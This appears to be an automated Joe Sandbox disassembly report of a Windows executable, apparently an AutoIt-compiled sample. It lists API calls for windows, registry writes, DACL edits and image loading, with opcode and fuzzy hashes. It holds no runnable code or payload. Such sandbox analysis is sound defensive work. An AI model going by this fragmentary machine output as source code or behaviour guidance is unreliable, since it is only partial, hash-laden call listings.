  • Part of subcall function 00E08172: CloseHandle.KERNEL32 ref: 00E081D1
Similarity
• API ID: CloseCreateDialogHandleNtdllProc_Process
• String ID:
• API String ID: 4178364262-0
• Opcode ID: 5a238ab167399f105ff6094a06bc72ddbc280630fd6198487251a8d07e823e00
• Instruction ID: bc13a40e899601369d322497e1bb0e3177f73ce6286bdcb971514f423536e913
• Opcode Fuzzy Hash: 5a238ab167399f105ff6094a06bc72ddbc280630fd6198487251a8d07e823e00
• Instruction Fuzzy Hash: CBE04635100208EFCB01AF15EC64E863BB2FB08351F004144FA11272F2CB32A9E1EF10
APIs
  • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
  • Part of subcall function 00D88BCD: DestroyWindow.USER32(?), ref: 00D88C81
  • Part of subcall function 00D88BCD: KillTimer.USER32(00000000,?,?,?,?,00D88BBA,00000000,?), ref: 00D88D1B
• NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?), ref: 00D88BC3
Similarity
• API ID: Window$DestroyDialogKillLongNtdllProc_Timer
• String ID:
• API String ID: 2797419724-0
• Opcode ID: d5950c1513dcb8cb0426d99916e63f5e982c93b2354effad504f97e8f6618199
• Instruction ID: d2a13afea0f122b417178508cd9c5087f4072e5823c39b74fed391f877dc3487
• Opcode Fuzzy Hash: d5950c1513dcb8cb0426d99916e63f5e982c93b2354effad504f97e8f6618199
• Instruction Fuzzy Hash: 1BD012742403087BEE103B61EC0BF597A19DB44790F508120F604391D2CA7374D09678
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00D903EE), ref: 00D909DA
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 54ae55a1c6cbb806820630f8b21a404286d4bff9385bb8f128f51d4e58527dfd
• Instruction ID: 585ea51ac33ea08f0e4f2e61d5815cfb19836345bc084c61791ce55fb98e6b92
• Opcode Fuzzy Hash: 54ae55a1c6cbb806820630f8b21a404286d4bff9385bb8f128f51d4e58527dfd
• Instruction Fuzzy Hash:
Strings
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00DF2B30
                                              • DeleteObject.GDI32(00000000), ref: 00DF2B43
                                              • DestroyWindow.USER32 ref: 00DF2B52
                                              • GetDesktopWindow.USER32 ref: 00DF2B6D
                                              • GetWindowRect.USER32(00000000), ref: 00DF2B74
                                              • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00DF2CA3
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00DF2CB1
                                              • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2CF8
                                              • GetClientRect.USER32(00000000,?), ref: 00DF2D04
                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DF2D40
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D62
                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D75
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D80
                                              • GlobalLock.KERNEL32(00000000), ref: 00DF2D89
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D98
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00DF2DA1
                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2DA8
                                              • GlobalFree.KERNEL32(00000000), ref: 00DF2DB3
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DF2DC5
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E0FC38,00000000), ref: 00DF2DDB
                                              • GlobalFree.KERNEL32(00000000), ref: 00DF2DEB
                                              • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00DF2E11
                                              • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00DF2E30
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2E52
                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF303F
                                              Similarity
                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                              • String ID: $AutoIt v3$DISPLAY$static
                                              APIs
                                              • SetTextColor.GDI32(?,00000000), ref: 00E0712F
                                              • GetSysColorBrush.USER32(0000000F), ref: 00E07160
                                              • GetSysColor.USER32(0000000F), ref: 00E0716C
                                              • SetBkColor.GDI32(?,000000FF), ref: 00E07186
                                              • SelectObject.GDI32(?,?), ref: 00E07195
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00E071C0
                                              • GetSysColor.USER32(00000010), ref: 00E071C8
                                              • CreateSolidBrush.GDI32(00000000), ref: 00E071CF
                                              • FrameRect.USER32(?,?,00000000), ref: 00E071DE
                                              • DeleteObject.GDI32(00000000), ref: 00E071E5
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00E07230
                                              • FillRect.USER32(?,?,?), ref: 00E07262
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E07284
                                                • Part of subcall function 00E073E8: GetSysColor.USER32(00000012), ref: 00E07421
                                                • Part of subcall function 00E073E8: SetTextColor.GDI32(?,?), ref: 00E07425
                                                • Part of subcall function 00E073E8: GetSysColorBrush.USER32(0000000F), ref: 00E0743B
                                                • Part of subcall function 00E073E8: GetSysColor.USER32(0000000F), ref: 00E07446
                                                • Part of subcall function 00E073E8: GetSysColor.USER32(00000011), ref: 00E07463
                                                • Part of subcall function 00E073E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E07471
                                                • Part of subcall function 00E073E8: SelectObject.GDI32(?,00000000), ref: 00E07482
                                                • Part of subcall function 00E073E8: SetBkColor.GDI32(?,00000000), ref: 00E0748B
                                                • Part of subcall function 00E073E8: SelectObject.GDI32(?,?), ref: 00E07498
                                                • Part of subcall function 00E073E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00E074B7
                                                • Part of subcall function 00E073E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E074CE
                                                • Part of subcall function 00E073E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00E074DB
                                              Similarity
                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                              • String ID:
                                              APIs
                                              • DestroyWindow.USER32(00000000), ref: 00DF273E
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DF286A
                                              • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00DF28A9
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00DF28B9
                                              • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00DF2900
                                              • GetClientRect.USER32(00000000,?), ref: 00DF290C
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00DF2955
                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DF2964
                                              • GetStockObject.GDI32(00000011), ref: 00DF2974
                                              • SelectObject.GDI32(00000000,00000000), ref: 00DF2978
                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00DF2988
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DF2991
                                              • DeleteDC.GDI32(00000000), ref: 00DF299A
                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DF29C6
                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00DF29DD
                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00DF2A1D
                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DF2A31
                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00DF2A42
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00DF2A77
                                              • GetStockObject.GDI32(00000011), ref: 00DF2A82
                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DF2A8D
                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00DF2A97
                                              Similarity
                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                              • API String ID: 2910397461-517079104
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00DE4AED
                                              • GetDriveTypeW.KERNEL32(?,00E0CB68,?,\\.\,00E0CC08), ref: 00DE4BCA
                                              • SetErrorMode.KERNEL32(00000000,00E0CB68,?,\\.\,00E0CC08), ref: 00DE4D36
                                              Similarity
                                              • API ID: ErrorMode$DriveType
                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                              • API String ID: 2907320926-4222207086
                                              APIs
                                              • DestroyWindow.USER32(?,?), ref: 00D88E14
                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00DC6AC5
                                              • 6F540200.COMCTL32(?,000000FF,?), ref: 00DC6AFE
                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DC6F43
                                                • Part of subcall function 00D88F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D88BE8,?,00000000,?,?,?,?,00D88BBA,00000000,?), ref: 00D88FC5
                                              • SendMessageW.USER32(?,00001053), ref: 00DC6F7F
                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DC6F96
                                              Similarity
                                              • API ID: MessageSend$Window$DestroyF540200InvalidateMoveRect
                                              • String ID: 0
                                              • API String ID: 2339618693-4108050209
                                              APIs
                                              • GetSysColor.USER32(00000012), ref: 00E07421
                                              • SetTextColor.GDI32(?,?), ref: 00E07425
                                              • GetSysColorBrush.USER32(0000000F), ref: 00E0743B
                                              • GetSysColor.USER32(0000000F), ref: 00E07446
                                              • CreateSolidBrush.GDI32(?), ref: 00E0744B
                                              • GetSysColor.USER32(00000011), ref: 00E07463
                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E07471
                                              • SelectObject.GDI32(?,00000000), ref: 00E07482
                                              • SetBkColor.GDI32(?,00000000), ref: 00E0748B
                                              • SelectObject.GDI32(?,?), ref: 00E07498
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00E074B7
                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E074CE
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E074DB
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E0752A
                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E07554
                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00E07572
                                              • DrawFocusRect.USER32(?,?), ref: 00E0757D
                                              • GetSysColor.USER32(00000011), ref: 00E0758E
                                              • SetTextColor.GDI32(?,00000000), ref: 00E07596
                                              • DrawTextW.USER32(?,00E070F5,000000FF,?,00000000), ref: 00E075A8
                                              • SelectObject.GDI32(?,?), ref: 00E075BF
                                              • DeleteObject.GDI32(?), ref: 00E075CA
                                              • SelectObject.GDI32(?,?), ref: 00E075D0
                                              • DeleteObject.GDI32(?), ref: 00E075D5
                                              • SetTextColor.GDI32(?,?), ref: 00E075DB
                                              • SetBkColor.GDI32(?,?), ref: 00E075E5
                                              Similarity
                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 1996641542-0
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00E01128
                                              • GetDesktopWindow.USER32 ref: 00E0113D
                                              • GetWindowRect.USER32(00000000), ref: 00E01144
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E01199
                                              • DestroyWindow.USER32(?), ref: 00E011B9
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E011ED
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E0120B
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E0121D
                                              • SendMessageW.USER32(00000000,00000421,?,?), ref: 00E01232
                                              • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00E01245
                                              • IsWindowVisible.USER32(00000000), ref: 00E012A1
                                              • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00E012BC
                                              • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00E012D0
                                              • GetWindowRect.USER32(00000000,?), ref: 00E012E8
                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00E0130E
                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00E01328
                                              • CopyRect.USER32(?,?), ref: 00E0133F
                                              • SendMessageW.USER32(00000000,00000412,00000000), ref: 00E013AA
                                              Similarity
                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                              • String ID: ($0$tooltips_class32
                                              • API String ID: 698492251-4156429822
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D88968
                                              • GetSystemMetrics.USER32(00000007), ref: 00D88970
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D8899B
                                              • GetSystemMetrics.USER32(00000008), ref: 00D889A3
                                              • GetSystemMetrics.USER32(00000004), ref: 00D889C8
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D889E5
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D889F5
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D88A28
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D88A3C
                                              • GetClientRect.USER32(00000000,000000FF), ref: 00D88A5A
                                              • GetStockObject.GDI32(00000011), ref: 00D88A76
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D88A81
                                                • Part of subcall function 00D8912D: GetCursorPos.USER32(?), ref: 00D89141
                                                • Part of subcall function 00D8912D: ScreenToClient.USER32(00000000,?), ref: 00D8915E
                                                • Part of subcall function 00D8912D: GetAsyncKeyState.USER32(00000001), ref: 00D89183
                                                • Part of subcall function 00D8912D: GetAsyncKeyState.USER32(00000002), ref: 00D8919D
                                              • SetTimer.USER32(00000000,00000000,00000028,00D890FC), ref: 00D88AA8
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: AutoIt v3 GUI
                                              • API String ID: 1458621304-248962490
                                              APIs
                                                • Part of subcall function 00DD10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1114
                                                • Part of subcall function 00DD10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD1120
                                                • Part of subcall function 00DD10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD112F
                                                • Part of subcall function 00DD10F9: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00DD1136
                                                • Part of subcall function 00DD10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD114D
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DD0DF5
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DD0E29
                                              • GetLengthSid.ADVAPI32(?), ref: 00DD0E40
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00DD0E7A
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DD0E96
                                              • GetLengthSid.ADVAPI32(?), ref: 00DD0EAD
                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DD0EB5
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DD0EBC
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DD0EDD
                                              • CopySid.ADVAPI32(00000000), ref: 00DD0EE4
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DD0F13
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DD0F35
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DD0F47
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0F6E
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0F75
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0F7E
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0F85
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0F8E
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0F95
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD0FA1
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0FA8
                                                • Part of subcall function 00DD1193: GetProcessHeap.KERNEL32(00000008,00DD0BB1,?,00000000,?,00DD0BB1,?), ref: 00DD11A1
                                                • Part of subcall function 00DD1193: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00DD11A8
                                                • Part of subcall function 00DD1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DD0BB1,?), ref: 00DD11B7
                                              Similarity
                                              • API ID: Heap$Process$Security$Free$AllocateDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                              • String ID:
                                              • API String ID: 4042927181-0
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFC4BD
                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E0CC08,00000000,?,00000000,?,?), ref: 00DFC544
                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DFC5A4
                                              • _wcslen.LIBCMT ref: 00DFC5F4
                                              • _wcslen.LIBCMT ref: 00DFC66F
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00DFC6B2
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DFC7C1
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DFC84D
                                              • RegCloseKey.ADVAPI32(?), ref: 00DFC881
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DFC88E
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DFC960
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 9721498-966354055
                                              • Opcode ID: 47d4f6af0d63181bc69a6e3fbb91f7515c58ad2c38b3a38c7a9e9b2ca6050ae7
                                              • Instruction ID: 94a07c0f2baa351458f8ccbf3e4f48e1f592677113d33d219e5d7366d3b4c13f
                                              • Opcode Fuzzy Hash: 47d4f6af0d63181bc69a6e3fbb91f7515c58ad2c38b3a38c7a9e9b2ca6050ae7
                                              • Instruction Fuzzy Hash: C2127A352142059FDB14DF14C981E2AB7E5EF88714F19C85CF98A9B3A2EB31EC41CBA1
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00E009C6
                                              • _wcslen.LIBCMT ref: 00E00A01
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E00A54
                                              • _wcslen.LIBCMT ref: 00E00A8A
                                              • _wcslen.LIBCMT ref: 00E00B06
                                              • _wcslen.LIBCMT ref: 00E00B81
                                                • Part of subcall function 00D8F9F2: _wcslen.LIBCMT ref: 00D8F9FD
                                                • Part of subcall function 00DD2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DD2BFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                              • API String ID: 1103490817-4258414348
                                              • Opcode ID: dc2bb0a59c79c6598db3638b6e83941e6f7933b8ec04b60d59277ba63387d8a5
                                              • Instruction ID: a4aad1419aeb93ed143e75024e669543c48042186f9ed91b7b93f238d00b4fb2
                                              • Opcode Fuzzy Hash: dc2bb0a59c79c6598db3638b6e83941e6f7933b8ec04b60d59277ba63387d8a5
                                              • Instruction Fuzzy Hash: 79E1AE312083019FC714EF24C451A6AB7E1FF98318F54995DF89AAB3A2D730ED85CBA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharUpper
                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                              • API String ID: 1256254125-909552448
                                              • Opcode ID: 3ffdce3f17c25d3f5863bb9698d839cb745324b3e7b126aa95269c6a25b215f7
                                              • Instruction ID: afba2b1cae2e2b178ae7e955d05b07b405e9d8f26a376e8a1fe970aafde3cc15
                                              • Opcode Fuzzy Hash: 3ffdce3f17c25d3f5863bb9698d839cb745324b3e7b126aa95269c6a25b215f7
                                              • Instruction Fuzzy Hash: E271193262012E8BCB20DE3CCE525BE3391DFA0754F1AA528FD95A7284E631DD65C7B0
                                              APIs
                                              • _wcslen.LIBCMT ref: 00E0835A
                                              • _wcslen.LIBCMT ref: 00E0836E
                                              • _wcslen.LIBCMT ref: 00E08391
                                              • _wcslen.LIBCMT ref: 00E083B4
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E083F2
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00E0361A,?), ref: 00E0844E
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E08487
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E084CA
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E08501
                                              • FreeLibrary.KERNEL32(?), ref: 00E0850D
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E0851D
                                              • DestroyCursor.USER32(?), ref: 00E0852C
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E08549
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E08555
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Load$Image_wcslen$LibraryMessageSend$CursorDestroyExtractFreeIcon
                                              • String ID: .dll$.exe$.icl
                                              • API String ID: 391920613-1154884017
                                              • Opcode ID: 09183d5f456afbf1a2568c415fee7f03edac27b487e10f99daaa5e6e756384f6
                                              • Instruction ID: 3ccad150b56b8adc451e7cbe350e8cd381eb094d8ee4919089bc2b4c2df15dd9
                                              • Opcode Fuzzy Hash: 09183d5f456afbf1a2568c415fee7f03edac27b487e10f99daaa5e6e756384f6
                                              • Instruction Fuzzy Hash: 8B61EF71500219BEEB14DF64CD85FBE7BA8FB04B21F205609F855E61D1DB74A980CBA0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 0-1645009161
                                              • Opcode ID: cd7747440f55c17b8824b2064be8e88bdf8295eb6d5e3eef6c35682544ccc178
                                              • Instruction ID: cc6521e06ae7a7ee4acb59bcd80d60fb9184235657e6ad07485f8e3a84f82daf
